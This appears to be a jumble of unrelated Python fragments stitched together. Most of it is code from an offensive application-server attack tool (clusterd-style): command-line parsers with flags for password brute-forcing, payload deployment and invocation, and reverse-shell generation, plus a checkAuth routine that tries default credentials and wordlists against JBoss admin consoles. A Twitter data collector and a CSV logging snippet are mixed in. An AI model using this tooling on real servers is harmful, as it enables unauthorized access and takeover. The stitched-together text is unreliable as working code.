metavar='[windows|linux]', default='windows') remote.add_argument('-v', help='Specific version to test', action='store', dest='version', metavar='[version]', default=None) remote.add_argument('--usr-auth', help='Login credentials for service', action='store', dest='usr_auth', metavar='[username:password]') remote.add_argument('--fingerprint', help='Fingerprint the remote system', action='store_true', dest='fp', default=False) remote.add_argument("--arch", help='Specify remote OS architecture', action='store', dest='arch', default='x86', metavar='[x86|x64]') remote.add_argument("--delay", help='Delay N seconds between each attempt', action='store', dest='delay', default=None, metavar='[seconds]') # # deploy options # deploy = parser.add_argument_group( "Deploy", description='Deployment flags and settings') deploy.add_argument("--deploy", help='Deploy to the discovered service', action='store', dest='deploy', metavar='[file]') deploy.add_argument("--undeploy", help='Undeploy file from server', action='store', dest='undeploy', metavar='[context]') deploy.add_argument("--deployer", help="Specify a deployer to use", action='store', dest='deployer', default=None, metavar='[deployer]') deploy.add_argument("--invoke", help="Invoke payload after deployment", action='store_true', dest='invoke_payload', default=False) deploy.add_argument("--rand-payload", help='Use a random name for the deployed file', action='store_true', dest='rand_payload', default=None) deploy.add_argument("-b", help="Brute force credentials for user [admin]", action='store', dest='bf_user', metavar='[user]', default='admin') deploy.add_argument('--wordlist', help='Wordlist for brute forcing passwords', action='store', dest='wordlist', default=None, metavar='[path]') # # iterate over our supported platforms and build their # auxiliary modules # for platform in state.supported_platforms: group = parser.add_argument_group(platform + " modules") group = build_platform_flags(platform, group) other = parser.add_argument_group("Other", description='Miscellaneous flags') other.add_argument("--deployer-list", help="List all available deployers", action='store', dest='deploy_list', const='All', nargs='?', metavar='platform') other.add_argument("--aux-list", help="List all available exploits", action='store', dest='aux_list', const='All', nargs='?', metavar='platform') other.add_argument("--gen-payload", help='Generate a reverse shell payload', action='store', dest='generate_payload', metavar='[host:port] for reverse connection') other.add_argument( "--discover", help= "Attempt to discover application servers using the specified nmap gnmap output (use -sV when scanning)", action="store", dest='discovery_file', metavar='[discovery_file]') other.add_argument("--listen", help='Adapter to listen on when needed', action='store', dest='listener', metavar='[adapter]', default=None) other.add_argument("-d", help='Enable debug output', action='store_true', dest='debug', default=False) other.add_argument("-l", help='Log output to file [$time$_log.log]', dest='flog', action='store_true', default=False) # parse cli options options = parser.parse_args(arguments) if len(sys.argv) <= 1: parser.print_help() sys.exit(1) # # Setup state variables from given flags # if options.proxy: state.proxy = options.proxy if options.proxy_auth: state.proxy_auth = options.proxy_auth if options.debug: state.isdebug = True if options.usr_auth: state.usr_auth = options.usr_auth if options.wordlist: state.bf_wordlist = options.wordlist if options.random_agent: # select a random user-agent from the list state.random_agent = choice(list( open('./src/lib/user-agents.txt'))).rstrip() utility.Msg("Random user agent '%s' selected" % (state.random_agent), LOG.DEBUG) if options.listener: state.listener = options.listener state.ssl = options.ssl state.bf_user = options.bf_user state.flog = ("%s_log.log" % utility.timestamp().replace(' ', '_') if options.flog else None) try: state.timeout = float(options.timeout) except: utility.Msg( "Timeout value must be an integer. Defaulting to %d." % state.timeout, LOG.ERROR) return options
def checkAuth(ip, port, title, version): """ """ if version in ["5.1", "6.0", "6.1"] and title is JINTERFACES.WM: for (usr, pswd) in default_credentials: url = "http://%s:%s/admin-console/login.seam" % (ip, port) data = OrderedDict([ ("login_form", "login_form"), ("login_form:name", usr), ("login_form:password", pswd), ("login_form:submit", "Login"), ("javax.faces.ViewState", utility.fetch_viewState(url)), ]) response = utility.requests_post(url, data=data) if response.status_code == 200: utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd), LOG.DEBUG) if version in ["5.1"]: return (dict_from_cookiejar(response.history[0].cookies), None) return (dict_from_cookiejar(response.cookies), None) else: if title is JINTERFACES.JMX: url = "http://%s:%s/jmx-console/" % (ip, port) elif title is JINTERFACES.MM: url = "http://%s:%s/management" % (ip, port) elif title is JINTERFACES.WC: url = "http://%s:%s/web-console" % (ip, port) else: utility.Msg("Unsupported auth interface: %s" % title, LOG.DEBUG) return # check with given auth if state.usr_auth: (usr, pswd) = state.usr_auth.split(':') return _auth(usr, pswd, url, version) # else try default credentials for (usr, pswd) in default_credentials: cook = _auth(usr, pswd, url, version) if cook: return cook # if we're still here, check if they supplied a wordlist if state.bf_wordlist and not state.hasbf: state.hasbf = True wordlist = [] with open(state.bf_wordlist, 'r') as f: # ensure everything is ascii or requests will explode wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()] utility.Msg("Brute forcing %s account with %d passwords..." % (state.bf_user, len(wordlist)), LOG.DEBUG) try: for (idx, word) in enumerate(wordlist): stdout.flush() stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \ % (utility.timestamp(), state.bf_user, idx+1, len(wordlist))) cook = _auth(state.bf_user, word, url, version) if cook: print '' # newline # lets insert these credentials to the default list so we # don't need to bruteforce it each time if not (state.bf_user, word) in default_credentials: default_credentials.insert(0, (state.bf_user, word)) utility.Msg("Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS) return cook print '' except KeyboardInterrupt: pass
from datetime import datetime import json from os import rename import lib from s3 import create_boto_client, process_local_file_to_S3 from twitter_funcs import collect_tweets, create_tweet_iterator from mongo import create_mongo_client_to_database_collection, insert_to_mongo from utility import get_credentials, timestamp, write_to_disk from requests import HTTPError if __name__ == "__main__": credentials = get_credentials() if credentials['twitter']['token'] is None: print( "Did you forget to add your twitter tokens to the credentials.json file?" ) raise HTTPError tweet_iterator = create_tweet_iterator() s3_client = create_boto_client() collection_client = create_mongo_client_to_database_collection() while True: timestamp() tweets = collect_tweets(tweet_iterator, 100) filename = write_to_disk(tweets) process_local_file_to_S3(s3_client, filename) insert_to_mongo(s3_client, collection_client, filename)
def parse(arguments): """ Parse command line options """ parser = ArgumentParser(usage='./clusterd.py [options]') # # Connection related command line arguments # connection = parser.add_argument_group("Connection", description = 'Options for configuring the connection') connection.add_argument("-i", help='Server address', action='store', dest='ip', metavar='[ip address]') connection.add_argument("-iL", help='Server list', action='store', dest='input_list', metavar='[file]') connection.add_argument('-p', help='Server port', action='store', dest='port', type=int, metavar='[port]') connection.add_argument('--proxy', help='Connect through proxy [http|https]', action='store', dest='proxy', metavar="[proxy://server:port]") connection.add_argument('--proxy-auth', help='Proxy credentials', action='store', dest='proxy_auth', metavar='[username:password]') connection.add_argument('--timeout', help='Connection timeout [%ds]' % state.timeout, action='store', dest='timeout', default=state.timeout, metavar='[seconds]') connection.add_argument("--random-agent", help='Use a random User-Agent for'\ ' requests', action='store_true', dest='random_agent', default=False) connection.add_argument("--ssl", help='Force SSL', action='store_true', dest='ssl', default=False) # # Remote host command line arguments # remote = parser.add_argument_group('Remote Host', description = 'Settings specific to the remote host') remote.add_argument('-a', help='Hint at remote host service', action='store', dest='remote_service', metavar='[%s]' % ('|'.join(state.supported_platforms))) remote.add_argument('-o', help='Hint at remote host OS', action='store', dest='remote_os', metavar='[windows|linux]', default='windows') remote.add_argument('-v', help='Specific version to test', action='store', dest='version', metavar='[version]', default=None) remote.add_argument('--usr-auth', help='Login credentials for service', action='store', dest='usr_auth', metavar='[username:password]') remote.add_argument('--fingerprint', help='Fingerprint the remote system', action='store_true', dest='fp', default=False) remote.add_argument("--arch", help='Specify remote OS architecture', action='store', dest='arch', default='x86', metavar='[x86|x64]') # # deploy options # deploy = parser.add_argument_group("Deploy", description = 'Deployment flags and settings') deploy.add_argument("--deploy", help='Deploy to the discovered service', action='store', dest='deploy', metavar='[file]') deploy.add_argument("--undeploy", help='Undeploy file from server', action='store', dest='undeploy', metavar='[context]') deploy.add_argument("--deployer", help="Specify a deployer to use", action='store', dest='deployer', default=None, metavar='[deployer]') deploy.add_argument("--invoke", help="Invoke payload after deployment", action='store_true', dest='invoke_payload', default=False) deploy.add_argument("--rand-payload", help='Use a random name for the deployed file', action='store_true', dest='rand_payload', default=None) deploy.add_argument("-b", help="Brute force credentials for user [admin]", action='store', dest='bf_user', metavar='[user]', default='admin') deploy.add_argument('--wordlist', help='Wordlist for brute forcing passwords', action='store', dest='wordlist', default=None, metavar='[path]') # # iterate over our supported platforms and build their # auxiliary modules # for platform in state.supported_platforms: group = parser.add_argument_group(platform + " modules") group = build_platform_flags(platform, group) other = parser.add_argument_group("Other", description='Miscellaneous flags') other.add_argument("--deployer-list", help="List all available deployers", action='store_true', dest='deploy_list', default=False) other.add_argument("--aux-list", help="List all available exploits", action='store_true', dest='aux_list', default=False) other.add_argument("--gen-payload", help='Generate a reverse shell payload', action='store', dest='generate_payload', metavar='[host:port] for reverse connection') other.add_argument("--discover",help="Attempt to discover application servers using the specified nmap gnmap output (use -sV when scanning)", action="store",dest='discovery_file',metavar='[discovery_file]') other.add_argument("--listen", help='Adapter to listen on when needed', action='store', dest='listener', metavar='[adapter]', default=None) other.add_argument("-d", help='Enable debug output', action='store_true', dest='debug', default=False) other.add_argument("-l", help='Log output to file [$time$_log.log]', dest='flog', action='store_true', default=False) # parse cli options options = parser.parse_args(arguments) if len(sys.argv) <= 1: parser.print_help() sys.exit(1) # # Setup state variables from given flags # if options.proxy: state.proxy = options.proxy if options.proxy_auth: state.proxy_auth = options.proxy_auth if options.debug: state.isdebug = True if options.usr_auth: state.usr_auth = options.usr_auth if options.wordlist: state.bf_wordlist = options.wordlist if options.random_agent: # select a random user-agent from the list state.random_agent = choice(list(open('./src/lib/user-agents.txt'))).rstrip() utility.Msg("Random user agent '%s' selected" % (state.random_agent), LOG.DEBUG) if options.listener: state.listener = options.listener state.ssl = options.ssl state.bf_user = options.bf_user state.flog = ("%s_log.log" % utility.timestamp().replace(' ', '_') if options.flog else None) try: state.timeout = float(options.timeout) except: utility.Msg("Timeout value must be an integer. Defaulting to %d." % state.timeout, LOG.ERROR) return options
writer = csv.DictWriter(f, headers) if not exist: writer.writeheader() writer.writerow( dict(mid=dn['mid'], aid=dn['aid'], cid=dn['cid'], title=dn['title'], url=dn['url'])) print('failed topic saved in {}'.format(fn)) except Exception as e: logger.error('error : failed to save topics. {}'.format(e)) if __name__ == '__main__': runid = utility.timestamp() md, kw, params = parse_command_line() if md is None: exit(-1) if md == 'h': if os.path.isfile('help.txt'): if 'Darwin' in platform.system(): os.system('cat help.txt') if 'Windows' in platform.system(): os.system('type help.txt') exit(0) all_topics, all_files, all_downloads = [], [], [] startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW